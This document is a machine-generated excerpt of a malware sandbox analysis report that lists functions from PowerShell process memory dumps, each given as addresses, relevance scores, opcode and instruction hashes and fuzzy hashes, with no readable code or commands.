                                                              • Instruction Fuzzy Hash: 692232B1A0020A9FCF15DB6885516AABBEAFF89314F0484BED905CF251DB35D944CBA3
                                                              Function 079C3CE8 Relevance: 5.6, Strings: 4, Instructions: 593COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4'jq$4'jq$4'jq$4'jq
                                                              • API String ID: 0-4000621977
                                                              • Opcode ID: e7cbcf91a50f2777da7fd723d9dbe33e3c37e164a3a0c046c342b099c03c9ada
                                                              • Instruction ID: 21df9363a0e6fc7d9f9735e3f642980efe72f1295dcde276f4b6d54ac6a4e778
                                                              • Opcode Fuzzy Hash: e7cbcf91a50f2777da7fd723d9dbe33e3c37e164a3a0c046c342b099c03c9ada
                                                              • Instruction Fuzzy Hash: C21255B1B002459FCF11CB6888216ABBFAAAFD1318F14C46ED905CF2A5DA31D955C7A3
                                                              Function 04B4E610 Relevance: 2.6, Strings: 2, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pij$J&l
                                                              • API String ID: 0-1760783336
                                                              • Opcode ID: e5d32f3badbfb7d3b4a6261c2e5d76672aaf857831958e44bc5f75b2ff31a955
                                                              • Instruction ID: 4f60663cfa34e06bc3fdfdcfea73939a8f933fa987ca57d8ddf7b877a0781389
                                                              • Opcode Fuzzy Hash: e5d32f3badbfb7d3b4a6261c2e5d76672aaf857831958e44bc5f75b2ff31a955
                                                              • Instruction Fuzzy Hash: 0941BC34A042459FCB25DF78E554ADEBBF2FF89214F1481A9D415EB3A6CB30AC49CB90
                                                              Function 04B4E640 Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: pij$J&l
                                                              • API String ID: 0-1760783336
                                                              • Opcode ID: 45ade282d97fb1602e3c33770ae50cba3f81e6e3f57bff5413e620837dffa07a
                                                              • Instruction ID: 5366ddc656726e7c6c8305f371f4e8c60692f8fc1960632e3f35b74834f2bd36
                                                              • Opcode Fuzzy Hash: 45ade282d97fb1602e3c33770ae50cba3f81e6e3f57bff5413e620837dffa07a
                                                              • Instruction Fuzzy Hash: F9316C34A006059FCB24DF79E994A9EBBF2FF88314F10C569E416AB394DB34AD05CB90
                                                              Function 04B46FC8 Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (nq
                                                              • API String ID: 0-2756854522
                                                              • Opcode ID: 4029f5e4332a4958589a09f614a3fdf0cf33e929524c550c9c0070f6377dd3a1
                                                              • Instruction ID: 1b9ab29233d131dba52f45f9bd3f082bcacbb0179020afbfca5ec67601014084
                                                              • Opcode Fuzzy Hash: 4029f5e4332a4958589a09f614a3fdf0cf33e929524c550c9c0070f6377dd3a1
                                                              • Instruction Fuzzy Hash: 31411934A052058FDB149FA8C558AAABBF2EF8D311F1490A9E502EB391DF35EC01DB61
                                                              Function 04B4AFA8 Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&jq
                                                              • API String ID: 0-3222446104
                                                              • Opcode ID: 4888606898b02f7e00b5f7281bd5e376c742016ca96a2d0280ee9e3d8fb640bb
                                                              • Instruction ID: 99578b36ddba490cf4253acbe4abd73531adca61eb497981f98a32827a742912
                                                              • Opcode Fuzzy Hash: 4888606898b02f7e00b5f7281bd5e376c742016ca96a2d0280ee9e3d8fb640bb
                                                              • Instruction Fuzzy Hash: F021AE75A043588FCB24DBAED404BAEBFF5EB89320F14846AD518A7350CA74A8458BA5
                                                              Function 04B4F7C1 Relevance: 1.3, Strings: 1, Instructions: 41COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: U
                                                              • API String ID: 0-3372436214
                                                              • Opcode ID: 750a273e5de61f6212ee407e14a86b3d1a5b5105f54da2ab68c5bd3d68e5a5aa
                                                              • Instruction ID: 3db92ef5ec19d133480c32e0e1430da50d3f751e7e48e69f047d723c5c6c7e7f
                                                              • Opcode Fuzzy Hash: 750a273e5de61f6212ee407e14a86b3d1a5b5105f54da2ab68c5bd3d68e5a5aa
                                                              • Instruction Fuzzy Hash: 7D01E571D0079ADBCB10DFA4C9446EDBBB1FF99310F10471AE009AA611EBB0268ACB80
                                                              Function 079C17B8 Relevance: .3, Instructions: 336COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3aa2879ddd9981c609dfdfb2dc88866f1024f45504383afa08cced1dcce1f9e0
                                                              • Instruction ID: 373f9eef4dc470f2cf51645da7c3b3bdaff2914c9ba8efbc4d601de05b2899a1
                                                              • Opcode Fuzzy Hash: 3aa2879ddd9981c609dfdfb2dc88866f1024f45504383afa08cced1dcce1f9e0
                                                              • Instruction Fuzzy Hash: 28B152F1B442099FCB14DB6CD4006AABBEAEF86214F18C4BED905CB252DB31D951C7A6
                                                              Function 04B429F0 Relevance: .2, Instructions: 207COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b1b5e11181562d3d7708dea7c8b42ec648001c7f4504b971acbc3c057035f5ef
                                                              • Instruction ID: 690e49f04b440f205743824f9198d40e0265e1e77596b2b16ef1ada38ff0e19d
                                                              • Opcode Fuzzy Hash: b1b5e11181562d3d7708dea7c8b42ec648001c7f4504b971acbc3c057035f5ef
                                                              • Instruction Fuzzy Hash: 75917A74A00205CFCB19CF58C5949AEFBB1FF88310B258699E815AB3A5C735FC91DBA0
                                                              Function 04B4BAD0 Relevance: .2, Instructions: 155COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cb3a523ca50276b3f969d0d0dc8c6d54d8efa507b0e4aedbde3e13a8f268de94
                                                              • Instruction ID: 148993b5ba85f8ab5e5ec2590294533c3443c7920f9f3ac3be7d736de1a831b0
                                                              • Opcode Fuzzy Hash: cb3a523ca50276b3f969d0d0dc8c6d54d8efa507b0e4aedbde3e13a8f268de94
                                                              • Instruction Fuzzy Hash: C3611771E00248DFCB14DFA9D584A9DBBF5FF88310F14816AE918AB365EB34AC45CB90
                                                              Function 04B4BAC0 Relevance: .2, Instructions: 151COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 269d64104620499680e2f28f7b823c834c70710699b4ce69f0dd95c9e60586ea
                                                              • Instruction ID: ef2f5c89357f3049ceb43c9758a527e47c426b4b6dd100d08817929f4429a47e
                                                              • Opcode Fuzzy Hash: 269d64104620499680e2f28f7b823c834c70710699b4ce69f0dd95c9e60586ea
                                                              • Instruction Fuzzy Hash: 37512875E00348DFCB14DFA9D584A9DBBF5FF88310F14806AE919AB365DB34A845CB90
                                                              Function 04B4E421 Relevance: .1, Instructions: 138COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 14f75326670499232e424af5aab2bf3ebbb52f6f9cf72d6b2ea1214655052301
                                                              • Instruction ID: 41e2fb861301eae44b8eeaa187c1042a459324455cd518d0baf0cb67eb26141c
                                                              • Opcode Fuzzy Hash: 14f75326670499232e424af5aab2bf3ebbb52f6f9cf72d6b2ea1214655052301
                                                              • Instruction Fuzzy Hash: 71413774B002058FCB14DF6CD98496EBBE6FFC821471584A9E54ACF366EB34EC068B51
                                                              Function 04B4E430 Relevance: .1, Instructions: 130COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c44317389abc2ecf80e3cf4330218fb22bc683ee8f9ca41d037e13b67ea9021
                                                              • Instruction ID: e1cce8e423854284ea755d0c5b23755939c59ac2b82dce16ae852458247e1e55
                                                              • Opcode Fuzzy Hash: 2c44317389abc2ecf80e3cf4330218fb22bc683ee8f9ca41d037e13b67ea9021
                                                              • Instruction Fuzzy Hash: B841FA74B002058FCB14DF6CDA9496ABBE6FFC831471584A9E559CF365EB34EC018B51
                                                              Function 079C3CCC Relevance: .1, Instructions: 124COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2115212357.00000000079C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 079C0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_79c0000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 5bd2a5141823582142807f1c289c0274ba65246cf7612ec6a635b514e4dd86bc
                                                              • Instruction ID: 2aaaa4ab29f5fac1c71bb244e53e403a3a66a4d1bba202d83d88e05d599dec33
                                                              • Opcode Fuzzy Hash: 5bd2a5141823582142807f1c289c0274ba65246cf7612ec6a635b514e4dd86bc
                                                              • Instruction Fuzzy Hash: F141F5F1A10206DBCF21CF24C5416ABBBB6AB80648F45C4ADD9009F296D731ED45C7A7
                                                              Function 04B42B00 Relevance: .1, Instructions: 106COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: fc96c12707709aa89fc88048efaa9c113d69351aa0ffc3eb57d934024cf544a1
                                                              • Instruction ID: 8c4d890bcad47dd04af2b005f10b08afaadcc04668ce69569d8b7029cd3135ce
                                                              • Opcode Fuzzy Hash: fc96c12707709aa89fc88048efaa9c113d69351aa0ffc3eb57d934024cf544a1
                                                              • Instruction Fuzzy Hash: E7413974A00505CFCB09CF58C5989AEFBB1FF88314B158599E855AB365C732FC91EBA0
                                                              Function 04B4C398 Relevance: .1, Instructions: 101COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 7287e5bcce7ec1db4238ee6cb30bd78df1bd5e5781f64cd0ff12590e080a8771
                                                              • Instruction ID: 02143b87f0ca6d9ea4a9c12f2b2ad9668e81ccd6c667d7ec0a0680483325e2c6
                                                              • Opcode Fuzzy Hash: 7287e5bcce7ec1db4238ee6cb30bd78df1bd5e5781f64cd0ff12590e080a8771
                                                              • Instruction Fuzzy Hash: 38317E353016019FD715EB78E854B9ABBAAEFC8211F008579D609CB265DF74A809C791
                                                              Function 04B46FC4 Relevance: .1, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9000631006728def80bf7a04c88d1d0f9bf09b46a7492df098298eb54a6a749e
                                                              • Instruction ID: cdd762ceb3dda326a920399336ac9651f9951f7afe32365f4143085f813030cd
                                                              • Opcode Fuzzy Hash: 9000631006728def80bf7a04c88d1d0f9bf09b46a7492df098298eb54a6a749e
                                                              • Instruction Fuzzy Hash: E631FB34A011058FDB14DFA4D558AAABBF2EFCD315F1490A9E502AB361DF31EC41DB60
                                                              Function 04B4AE70 Relevance: .1, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4e523e6ec4abddcb6724847102b5b5dca4a5c16cfa7440511a578d8c7f44a1a3
                                                              • Instruction ID: 1ba91d1f799486ff5f629c5a394a73de69499e09f24b097f71234f965269d13f
                                                              • Opcode Fuzzy Hash: 4e523e6ec4abddcb6724847102b5b5dca4a5c16cfa7440511a578d8c7f44a1a3
                                                              • Instruction Fuzzy Hash: 21317E74E402098FDB14DFA9D4946AEBBF6EFC8310F14806DE805EB364EB349C459B61
                                                              Function 04B47728 Relevance: .1, Instructions: 88COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e9cd238830fd50f4656ed0e6dbbddf6a8b3f983efa1f47bd7f121eafccad0fe1
                                                              • Instruction ID: f876a86550a257bb54b30f508044000cbd5438c589f0e3656fbf8ad9ea42ba93
                                                              • Opcode Fuzzy Hash: e9cd238830fd50f4656ed0e6dbbddf6a8b3f983efa1f47bd7f121eafccad0fe1
                                                              • Instruction Fuzzy Hash: B52176347002059FD714CA69C944B2AB7EAEFC8258F6588A9D50ACB352EB35E801DBA0
                                                              Function 04B4AD38 Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1155e7a6005ce15959013d12ffdd90204418a8e46a1720e3964c3185e9115460
                                                              • Instruction ID: c5597f7f325f5f01ef083cef75ec1825c4ee5e15cfc65d1735f5abefb4a22f17
                                                              • Opcode Fuzzy Hash: 1155e7a6005ce15959013d12ffdd90204418a8e46a1720e3964c3185e9115460
                                                              • Instruction Fuzzy Hash: 8C3161B8A007459FDB05DBA4D854ABE7BB6EF89300F1184A9C611AF3A5CB38DD45CB50
                                                              Function 04B4AE80 Relevance: .1, Instructions: 84COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 81e80f5ff4c43688b3706f33c4e98b9f5303b719722dafb1fa33c4f354a21d59
                                                              • Instruction ID: 9868897042755821d9cd65660c813de33128d0b57c2c2baa7fc2e54ac754006d
                                                              • Opcode Fuzzy Hash: 81e80f5ff4c43688b3706f33c4e98b9f5303b719722dafb1fa33c4f354a21d59
                                                              • Instruction Fuzzy Hash: FE315C74A402099FDB14DFA9D4947AEBBF6EFCC300F108069E805EB354EB349C059B65
                                                              Function 04B4DFC8 Relevance: .1, Instructions: 82COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 9d7aa938b7f1ef678029bf6ef46a58e1c4f38f2c8747bead5568f100eafdc4c7
                                                              • Instruction ID: 196f6c518ee4cb6a583f0b65859ec966f82113429e462b1885a0d375482ebdcc
                                                              • Opcode Fuzzy Hash: 9d7aa938b7f1ef678029bf6ef46a58e1c4f38f2c8747bead5568f100eafdc4c7
                                                              • Instruction Fuzzy Hash: B9314E74A002049FCB24DF68E458AAEBBF2FF88314F1485A9D816EB361DB71AC45CB51
                                                              Function 04B4AD48 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c5216cd09ed4983c2fafb49b4ea7d64820c63b67be294cba25b25101bb7231e1
                                                              • Instruction ID: 525e52f24c1a6a81d64ff4259cc67514c583cfecde75686c83e7f09d715f66c8
                                                              • Opcode Fuzzy Hash: c5216cd09ed4983c2fafb49b4ea7d64820c63b67be294cba25b25101bb7231e1
                                                              • Instruction Fuzzy Hash: DF3112B8A006059FDB04EFA4D954ABEB7B7EF88300F108469D611AB394DF35DD418B90
                                                              Function 04B4DFD8 Relevance: .1, Instructions: 77COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 500f6cfe2176c85e110f822a243683ac2174776531846c625fb7cb13ab390eb3
                                                              • Instruction ID: e2c556914e1e35226f8d02176157d9778328f404240b71dd76f50c4f3979df0f
                                                              • Opcode Fuzzy Hash: 500f6cfe2176c85e110f822a243683ac2174776531846c625fb7cb13ab390eb3
                                                              • Instruction Fuzzy Hash: 1C312A74A002049FCB24DF68D458A9EBBF6FF88214F048569E806EB350DF31AC45CB90
                                                              Function 031FF3D8 Relevance: .1, Instructions: 76COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2098713914.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_31fd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2c828aa90549a0d75fd2932679e2710d313eff4e2556be57eefcaee4923a5e94
                                                              • Instruction ID: c248e928863221aeac609f82a5666b2f73624a4065152bf8843231d9708637ea
                                                              • Opcode Fuzzy Hash: 2c828aa90549a0d75fd2932679e2710d313eff4e2556be57eefcaee4923a5e94
                                                              • Instruction Fuzzy Hash: 5D21F476508604EFCB09CF54D9C0B26BF65FB8C314F24C5A9EA090A256C37AD457CBA1
                                                              Function 031FF02C Relevance: .1, Instructions: 72COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2098713914.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_31fd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e3872cf6ae3306c878630c208cdba8b4551a54bd46ed113f8f073532b11b28d2
                                                              • Instruction ID: 62ccba0936197966700fe85c6f89f0f38f4de0740bbc1cf93f4c5d52d2346557
                                                              • Opcode Fuzzy Hash: e3872cf6ae3306c878630c208cdba8b4551a54bd46ed113f8f073532b11b28d2
                                                              • Instruction Fuzzy Hash: 3E210475604244DFCB14DF24D9C4B26BFAAFB88314F28C5ADDA094B296C3BAD447CA61
                                                              Function 031FF4CC Relevance: .1, Instructions: 69COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2098713914.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_31fd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8d6b0fd9276546eca7fa3f7e1df25421c933f219c1200447720fe76d01f810ab
                                                              • Instruction ID: afb77927f1dba12b77f7f7fce428dca0be57eb856254dbf9cd28c587e4186b04
                                                              • Opcode Fuzzy Hash: 8d6b0fd9276546eca7fa3f7e1df25421c933f219c1200447720fe76d01f810ab
                                                              • Instruction Fuzzy Hash: DF2127B16442409FDB14DF28D5C4B36BBA9EB8C314F24C5ADDA094B361C3BAD447CAA1
                                                              Function 04B47830 Relevance: .1, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: c6559339bc888e0c46687b1aca47ac7de6fdae4b1f6cc4bb02afd0e67977a0f2
                                                              • Instruction ID: a1d30276cc9010de097d72f0e71a5d2ecb216c66c996e168f716e398e5a31836
                                                              • Opcode Fuzzy Hash: c6559339bc888e0c46687b1aca47ac7de6fdae4b1f6cc4bb02afd0e67977a0f2
                                                              • Instruction Fuzzy Hash: FA1191357002148FD7049B6AE954A6A7BEAFFC872071405AAE509CB395DF31DC05C790
                                                              Function 04B47664 Relevance: .1, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 92337ee66e5185603c98d0e6588a9d0eb7804306684baed2581f993c8c3e5bef
                                                              • Instruction ID: ff375eda8938379f7778a520b97bd65e65774624b777d1c9094995cd2e128cc1
                                                              • Opcode Fuzzy Hash: 92337ee66e5185603c98d0e6588a9d0eb7804306684baed2581f993c8c3e5bef
                                                              • Instruction Fuzzy Hash: 4011EC3AB002188FCB04DFA8E944A9D77F6EBC8215B1540A5E609DB325DB35ED16CB90
                                                              Function 04B42CA5 Relevance: .1, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: cd124c28bce155b1f57c6af7c9de4b0dbcd25f083e3aca1e4dac1a5ec0717c8e
                                                              • Instruction ID: 03b94b76a9f58401e5691a3eb4c00278dc8ba782d3a797663407e4447bf9645d
                                                              • Opcode Fuzzy Hash: cd124c28bce155b1f57c6af7c9de4b0dbcd25f083e3aca1e4dac1a5ec0717c8e
                                                              • Instruction Fuzzy Hash: 1311912590D7D15FC7078B3C98B44D9BF71AE87224B0A01D7D4E0CB1B3D6199909D76A
                                                              Function 04B49433 Relevance: .1, Instructions: 58COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 03e7dbb96f3d8b7add9545d3fb562492de74a0fea2e15f5525165d8780924eb8
                                                              • Instruction ID: 7551245c7759aaaf59dd664c7f26e6d7612881b09863666dbd29fc46d2b87952
                                                              • Opcode Fuzzy Hash: 03e7dbb96f3d8b7add9545d3fb562492de74a0fea2e15f5525165d8780924eb8
                                                              • Instruction Fuzzy Hash: 9621A9B4A057408FEB60CF7AC08839ABBE2EFC9310F28C49EC49D8B245C27864859B51
                                                              Function 04B493F8 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2099228486.0000000004B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B40000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_4b40000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bce79c9e41ae2f046095cb833cd975305f507f24e5aa51468a04b8870fddf5da
                                                              • Instruction ID: 8a4db3e50136cb2c3b007f366604621dcdb3f7845e50a79607dac73884af8388
                                                              • Opcode Fuzzy Hash: bce79c9e41ae2f046095cb833cd975305f507f24e5aa51468a04b8870fddf5da
                                                              • Instruction Fuzzy Hash: FD218BB49067848EEB60CF3ED0897DBBFF2EF88310F28C45DC45957205D67464818B51
                                                              Function 031FF3D3 Relevance: .1, Instructions: 57COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2098713914.00000000031FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 031FD000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_31fd000_powershell.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 057d58c605ff61dcea1d2f362fa95e4b0c0d59dde82fc64a3d1dc629ed531e57
